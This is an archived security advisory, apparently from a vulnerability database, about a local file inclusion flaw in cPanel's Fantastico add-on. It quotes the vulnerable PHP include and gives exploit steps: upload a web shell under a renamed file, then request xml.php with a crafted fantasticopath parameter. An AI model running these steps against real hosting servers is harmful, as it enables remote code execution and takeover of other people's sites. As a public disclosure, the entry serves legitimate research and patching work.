Cpanel <= 11.x (Fantastico) LFI Vulnerability (sec bypass)

2008-09-24 / 2008-09-25
Credit: joker_1
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################################## Fantastico In all Version Cpanel 11.x <= local File Include ############################################################## Must login to :2082 To break the protection mod_security & safe_mode: off & Disable functions : all none Vulnerable Code $licensing_servers=$fantasticopath . "/includes/enc_licensing_servers.php"; if (is_file($licensing_servers)) { include($licensing_servers); in http://xx.com:2082/frontend/x/fantastico/includes/xml.php Exploit >> First Create directory Let the name /includes/ and upload Shell.php in /includes/ Then rename it to enc_licensing_servers.php :::xploit:::: http://xxx.com:2082/frontend/x/fantastico/includes/xml.php?fantasticopath=/home/user ################################################### Discoverd By : joker_1 for info : pl57@msn.com ################################################### Special Greetings :- sniper-sa.com & Group XP & Alm3reFh.Com & Genral kbkb & step on the snow & red trigger & qalbhamad & saudi star ###################################################

References:

http://www.securityfocus.com/bid/31196
http://www.netenberg.com/forum/index.php?topic=6768.0
http://www.milw0rm.com/exploits/6461
http://secunia.com/advisories/31863


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top